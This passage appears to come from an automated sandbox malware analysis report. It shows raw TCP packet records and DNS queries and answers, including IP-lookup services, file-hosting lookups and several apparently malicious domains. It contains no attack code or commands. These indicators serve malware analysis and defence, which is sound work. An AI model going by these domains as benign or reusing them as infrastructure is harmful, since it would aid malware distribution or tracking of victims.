Mar 28, 2024 09:15:00.399844885 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:15:00.399844885 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:15:00.399847031 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.399854898 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.399909019 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.399915934 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.399919987 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:15:00.399919987 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:15:00.399960041 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.399966955 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.400049925 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.400051117 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:15:00.400051117 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:15:00.400058985 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.400074005 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.400114059 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.400121927 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.400192022 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.400203943 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.400237083 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.400239944 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:15:00.400239944 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:15:00.400239944 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:15:00.400244951 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.400254011 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.400294065 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:15:00.400294065 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:15:00.400294065 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:15:00.400324106 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.400331974 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.400343895 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.400351048 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.400374889 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.400398970 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.400439024 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:15:00.400439024 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:15:00.400455952 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:15:00.400455952 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:15:00.400455952 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:15:00.400470972 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:15:00.400484085 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.400490999 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.400537014 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.400543928 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.400556087 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:15:00.400566101 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.400676012 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.400877953 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.400887012 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.400893927 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.400932074 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.400933027 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.400959969 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.401165009 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.401173115 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.401196003 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.401513100 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.401602030 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.401660919 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.401690006 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.401923895 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.402028084 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.402081013 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.402184010 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.402350903 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.402523041 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.402532101 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.402589083 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.402645111 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.402647972 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.402870893 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.403143883 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.403218985 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.403265953 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.403352976 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.403666019 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.403676033 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.403747082 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.403803110 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.403856039 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.403888941 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.403934956 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.403994083 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.404055119 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.404103994 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.404311895 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.404850960 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.404947996 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.404989004 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.404995918 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.405016899 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.405375004 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.405766964 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.405776024 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.405838013 CET	49736	80	192.168.2.4	5.42.66.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 28, 2024 09:14:53.511126995 CET	192.168.2.4	1.1.1.1	0x805f	Standard query (0)	api.myip.com	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:54.103667974 CET	192.168.2.4	1.1.1.1	0xbcf5	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:58.175766945 CET	192.168.2.4	1.1.1.1	0xa3	Standard query (0)	ngovpn.com	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:58.176979065 CET	192.168.2.4	1.1.1.1	0xeaf8	Standard query (0)	vk.com	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:58.179115057 CET	192.168.2.4	1.1.1.1	0xc758	Standard query (0)	bitbucket.org	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:58.185450077 CET	192.168.2.4	1.1.1.1	0x1a5e	Standard query (0)	monoblocked.com	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:58.187251091 CET	192.168.2.4	1.1.1.1	0x9007	Standard query (0)	cybervincent.com	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:58.188682079 CET	192.168.2.4	1.1.1.1	0xeb21	Standard query (0)	act.fishoaks.net	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:58.191459894 CET	192.168.2.4	1.1.1.1	0x27f7	Standard query (0)	294anacamptometer.sbs	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:58.191802979 CET	192.168.2.4	1.1.1.1	0xd736	Standard query (0)	triedchicken.net	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:59.369072914 CET	192.168.2.4	1.1.1.1	0xbbb7	Standard query (0)	bbuseruploads.s3.amazonaws.com	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:59.417206049 CET	192.168.2.4	1.1.1.1	0xa1a1	Standard query (0)	carthewasher.net	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:59.422821999 CET	192.168.2.4	1.1.1.1	0xcd92	Standard query (0)	kilojagger.com	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:15:01.663609982 CET	192.168.2.4	1.1.1.1	0x6fe9	Standard query (0)	d.392391234.xyz	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:15:03.132982969 CET	192.168.2.4	1.1.1.1	0xca3c	Standard query (0)	sun6-20.userapi.com	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:15:03.281147957 CET	192.168.2.4	1.1.1.1	0x6fc5	Standard query (0)	sun6-21.userapi.com	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:15:05.403018951 CET	192.168.2.4	1.1.1.1	0x36cf	Standard query (0)	sun6-22.userapi.com	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:15:09.132977009 CET	192.168.2.4	1.1.1.1	0x7fe7	Standard query (0)	psv4.userapi.com	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:15:17.447215080 CET	192.168.2.4	1.1.1.1	0xd3fd	Standard query (0)	iplis.ru	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:15:18.935704947 CET	192.168.2.4	1.1.1.1	0xf07e	Standard query (0)	iplogger.org	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:15:20.997253895 CET	192.168.2.4	1.1.1.1	0x947a	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:15:53.224868059 CET	192.168.2.4	1.1.1.1	0x18f7	Standard query (0)	centrosmissextensions.com	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:00.026292086 CET	192.168.2.4	1.1.1.1	0xff7d	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:00.910830975 CET	192.168.2.4	1.1.1.1	0xda0b	Standard query (0)	db-ip.com	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:03.538378000 CET	192.168.2.4	1.1.1.1	0x7e00	Standard query (0)	nidoe.org	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:04.558021069 CET	192.168.2.4	1.1.1.1	0x7e00	Standard query (0)	nidoe.org	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:05.695458889 CET	192.168.2.4	1.1.1.1	0x7e00	Standard query (0)	nidoe.org	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.794956923 CET	192.168.2.4	1.1.1.1	0x7e00	Standard query (0)	nidoe.org	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:28.441169024 CET	192.168.2.4	1.1.1.1	0xf01d	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:30.799668074 CET	192.168.2.4	1.1.1.1	0x4fea	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 28, 2024 09:14:53.606841087 CET	1.1.1.1	192.168.2.4	0x805f	No error (0)	api.myip.com		104.26.9.59	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:53.606841087 CET	1.1.1.1	192.168.2.4	0x805f	No error (0)	api.myip.com		104.26.8.59	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:53.606841087 CET	1.1.1.1	192.168.2.4	0x805f	No error (0)	api.myip.com		172.67.75.163	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:54.199419022 CET	1.1.1.1	192.168.2.4	0xbcf5	No error (0)	ipinfo.io		34.117.186.192	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:58.271817923 CET	1.1.1.1	192.168.2.4	0xeaf8	No error (0)	vk.com		93.186.225.194	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:58.271817923 CET	1.1.1.1	192.168.2.4	0xeaf8	No error (0)	vk.com		87.240.132.72	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:58.271817923 CET	1.1.1.1	192.168.2.4	0xeaf8	No error (0)	vk.com		87.240.137.164	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:58.271817923 CET	1.1.1.1	192.168.2.4	0xeaf8	No error (0)	vk.com		87.240.132.67	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:58.271817923 CET	1.1.1.1	192.168.2.4	0xeaf8	No error (0)	vk.com		87.240.129.133	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:58.271817923 CET	1.1.1.1	192.168.2.4	0xeaf8	No error (0)	vk.com		87.240.132.78	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:58.273612976 CET	1.1.1.1	192.168.2.4	0xc758	No error (0)	bitbucket.org		18.205.93.0	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:58.273612976 CET	1.1.1.1	192.168.2.4	0xc758	No error (0)	bitbucket.org		18.205.93.1	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:58.273612976 CET	1.1.1.1	192.168.2.4	0xc758	No error (0)	bitbucket.org		18.205.93.2	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:58.286030054 CET	1.1.1.1	192.168.2.4	0xeb21	No error (0)	act.fishoaks.net		104.21.22.54	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:58.286030054 CET	1.1.1.1	192.168.2.4	0xeb21	No error (0)	act.fishoaks.net		172.67.202.245	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:58.289932013 CET	1.1.1.1	192.168.2.4	0x9007	No error (0)	cybervincent.com		104.21.36.53	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:58.289932013 CET	1.1.1.1	192.168.2.4	0x9007	No error (0)	cybervincent.com		172.67.185.238	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:58.294039011 CET	1.1.1.1	192.168.2.4	0xd736	No error (0)	triedchicken.net		172.67.180.119	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:58.294039011 CET	1.1.1.1	192.168.2.4	0xd736	No error (0)	triedchicken.net		104.21.91.214	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:58.297914982 CET	1.1.1.1	192.168.2.4	0x27f7	No error (0)	294anacamptometer.sbs		104.21.42.248	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:58.297914982 CET	1.1.1.1	192.168.2.4	0x27f7	No error (0)	294anacamptometer.sbs		172.67.214.18	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:58.593161106 CET	1.1.1.1	192.168.2.4	0x1a5e	No error (0)	monoblocked.com		45.130.41.108	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:58.693695068 CET	1.1.1.1	192.168.2.4	0xa3	No error (0)	ngovpn.com		130.164.189.20	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:58.693695068 CET	1.1.1.1	192.168.2.4	0xa3	No error (0)	ngovpn.com		217.219.131.81	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:58.693695068 CET	1.1.1.1	192.168.2.4	0xa3	No error (0)	ngovpn.com		46.100.50.5	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:58.693695068 CET	1.1.1.1	192.168.2.4	0xa3	No error (0)	ngovpn.com		95.107.163.44	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:58.693695068 CET	1.1.1.1	192.168.2.4	0xa3	No error (0)	ngovpn.com		181.128.130.193	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:58.693695068 CET	1.1.1.1	192.168.2.4	0xa3	No error (0)	ngovpn.com		58.151.148.90	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:58.693695068 CET	1.1.1.1	192.168.2.4	0xa3	No error (0)	ngovpn.com		123.213.233.131	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:58.693695068 CET	1.1.1.1	192.168.2.4	0xa3	No error (0)	ngovpn.com		196.188.169.138	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:58.693695068 CET	1.1.1.1	192.168.2.4	0xa3	No error (0)	ngovpn.com		195.158.3.162	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:58.693695068 CET	1.1.1.1	192.168.2.4	0xa3	No error (0)	ngovpn.com		211.171.233.129	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:59.517965078 CET	1.1.1.1	192.168.2.4	0xa1a1	No error (0)	carthewasher.net		104.21.82.182	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:59.517965078 CET	1.1.1.1	192.168.2.4	0xa1a1	No error (0)	carthewasher.net		172.67.161.113	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:59.520387888 CET	1.1.1.1	192.168.2.4	0xcd92	No error (0)	kilojagger.com		172.67.218.160	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:59.520387888 CET	1.1.1.1	192.168.2.4	0xcd92	No error (0)	kilojagger.com		104.21.62.22	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:59.522699118 CET	1.1.1.1	192.168.2.4	0xbbb7	No error (0)	bbuseruploads.s3.amazonaws.com	s3-1-w.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 28, 2024 09:14:59.522699118 CET	1.1.1.1	192.168.2.4	0xbbb7	No error (0)	s3-1-w.amazonaws.com	s3-w.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 28, 2024 09:14:59.522699118 CET	1.1.1.1	192.168.2.4	0xbbb7	No error (0)	s3-w.us-east-1.amazonaws.com		52.216.219.33	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:59.522699118 CET	1.1.1.1	192.168.2.4	0xbbb7	No error (0)	s3-w.us-east-1.amazonaws.com		52.216.135.35	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:59.522699118 CET	1.1.1.1	192.168.2.4	0xbbb7	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.129.113	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:59.522699118 CET	1.1.1.1	192.168.2.4	0xbbb7	No error (0)	s3-w.us-east-1.amazonaws.com		54.231.169.97	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:59.522699118 CET	1.1.1.1	192.168.2.4	0xbbb7	No error (0)	s3-w.us-east-1.amazonaws.com		54.231.195.233	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:59.522699118 CET	1.1.1.1	192.168.2.4	0xbbb7	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.114.113	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:59.522699118 CET	1.1.1.1	192.168.2.4	0xbbb7	No error (0)	s3-w.us-east-1.amazonaws.com		16.182.99.201	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:14:59.522699118 CET	1.1.1.1	192.168.2.4	0xbbb7	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.29.140	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:15:02.009327888 CET	1.1.1.1	192.168.2.4	0x6fe9	No error (0)	d.392391234.xyz		95.164.45.22	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:15:03.228807926 CET	1.1.1.1	192.168.2.4	0xca3c	No error (0)	sun6-20.userapi.com		95.142.206.0	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:15:03.400121927 CET	1.1.1.1	192.168.2.4	0x6fc5	No error (0)	sun6-21.userapi.com		95.142.206.1	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:15:05.499882936 CET	1.1.1.1	192.168.2.4	0x36cf	No error (0)	sun6-22.userapi.com		95.142.206.2	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:15:09.233083010 CET	1.1.1.1	192.168.2.4	0x7fe7	No error (0)	psv4.userapi.com	ps.userapi.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 28, 2024 09:15:09.233083010 CET	1.1.1.1	192.168.2.4	0x7fe7	No error (0)	ps.userapi.com		87.240.190.89	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:15:09.233083010 CET	1.1.1.1	192.168.2.4	0x7fe7	No error (0)	ps.userapi.com		87.240.137.140	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:15:09.233083010 CET	1.1.1.1	192.168.2.4	0x7fe7	No error (0)	ps.userapi.com		87.240.137.134	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:15:09.233083010 CET	1.1.1.1	192.168.2.4	0x7fe7	No error (0)	ps.userapi.com		87.240.190.76	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:15:17.896433115 CET	1.1.1.1	192.168.2.4	0xd3fd	No error (0)	iplis.ru		104.21.63.150	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:15:17.896433115 CET	1.1.1.1	192.168.2.4	0xd3fd	No error (0)	iplis.ru		172.67.147.32	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:15:19.196470022 CET	1.1.1.1	192.168.2.4	0xf07e	No error (0)	iplogger.org		172.67.132.113	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:15:19.196470022 CET	1.1.1.1	192.168.2.4	0xf07e	No error (0)	iplogger.org		104.21.4.208	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:15:21.093511105 CET	1.1.1.1	192.168.2.4	0x947a	No error (0)	steamcommunity.com		23.47.27.74	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:15:53.328738928 CET	1.1.1.1	192.168.2.4	0x18f7	No error (0)	centrosmissextensions.com		162.19.138.79	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:00.121691942 CET	1.1.1.1	192.168.2.4	0xff7d	No error (0)	ipinfo.io		34.117.186.192	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:01.007504940 CET	1.1.1.1	192.168.2.4	0xda0b	No error (0)	db-ip.com		104.26.4.15	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:01.007504940 CET	1.1.1.1	192.168.2.4	0xda0b	No error (0)	db-ip.com		172.67.75.166	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:01.007504940 CET	1.1.1.1	192.168.2.4	0xda0b	No error (0)	db-ip.com		104.26.5.15	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894692898 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		37.255.238.137	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894692898 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		63.143.98.185	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894692898 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		109.175.29.39	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894692898 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		175.119.10.231	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894692898 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		190.224.203.37	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894692898 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		187.211.208.213	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894692898 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		148.230.249.9	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894692898 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		187.134.67.105	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894692898 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		190.98.23.157	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894692898 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		187.170.162.36	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894712925 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		37.255.238.137	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894712925 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		63.143.98.185	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894712925 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		109.175.29.39	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894712925 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		175.119.10.231	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894712925 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		190.224.203.37	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894712925 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		187.211.208.213	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894712925 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		148.230.249.9	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894712925 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		187.134.67.105	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894712925 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		190.98.23.157	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894712925 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		187.170.162.36	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894720078 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		37.255.238.137	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894720078 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		63.143.98.185	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894720078 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		109.175.29.39	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894720078 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		175.119.10.231	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894720078 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		190.224.203.37	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894720078 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		187.211.208.213	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894720078 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		148.230.249.9	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894720078 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		187.134.67.105	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894720078 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		190.98.23.157	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894720078 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		187.170.162.36	A (IP address)	IN (0x0001)	false
Mar 28, 2024 09:16:07.894731045 CET	1.1.1.1	192.168.2.4	0x7e00	No error (0)	nidoe.org		37.255.238.137	A (IP address)	IN (0x0001)	false
